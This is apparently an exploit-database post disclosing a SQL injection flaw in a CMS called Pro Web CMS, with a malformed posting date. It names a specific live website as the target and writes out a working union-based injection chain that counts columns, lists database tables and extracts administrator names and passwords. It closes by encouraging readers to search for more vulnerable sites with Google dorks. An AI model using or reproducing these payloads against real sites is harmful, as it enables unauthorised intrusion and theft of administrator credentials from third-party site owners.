Pro Web CMS Sql Injection Vulnerability
Posted on 30 November -0001
<HTML><HEAD><TITLE>Pro Web CMS Sql Injection Vulnerability</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY># Exploit Title : Pro Web CMS Sql Injection Vulnerability # Exploit Author : N_H # Date : 2016/08/13 # Tested on : MacOS , Windows , Ubuntu # Google Dork : No # Home Page : https://www.prowebghana.net # Web Server : Apache # Category : Web Application # Discovered by : N_H # Description : One Sql Injection Vulnerability Discovered on ProWeb CMS Websites by N_H. This vulnerability include all of websites of this United Kingdom CMS. Now thousands of websites in the world are on this content management system (CMS). # For example, one of the sites vulnerable to this bug we investigated ... -------------------------------------------------------------------------------------------------- Target : http://www.ghanawildlifesociety.org Vulnerable Location : http://www.ghanawildlifesociety.org/web.php?id=32 Columns Number : http://www.ghanawildlifesociety.org/web.php?id=32+order+by+3-- Tables of website : http://www.ghanawildlifesociety.org/web.php?id=32+union+select+group_concat%28Table_name%29,2,3+from+information_schema.tables+where+table_schema=database%28%29--+ User and Password of Administrator : http://www.ghanawildlifesociety.org/web.php?id=32+union+select+group_concat%280x3c62723e%20,name,0x3a,Pass%29,2,3+from+user--+ -------------------------------------------------------------------------------------------------- # Warning : You can finding more vulnerable websites of this CMS with your creative Google Dorks and other ways. # We are : Nobody </BODY></HTML>
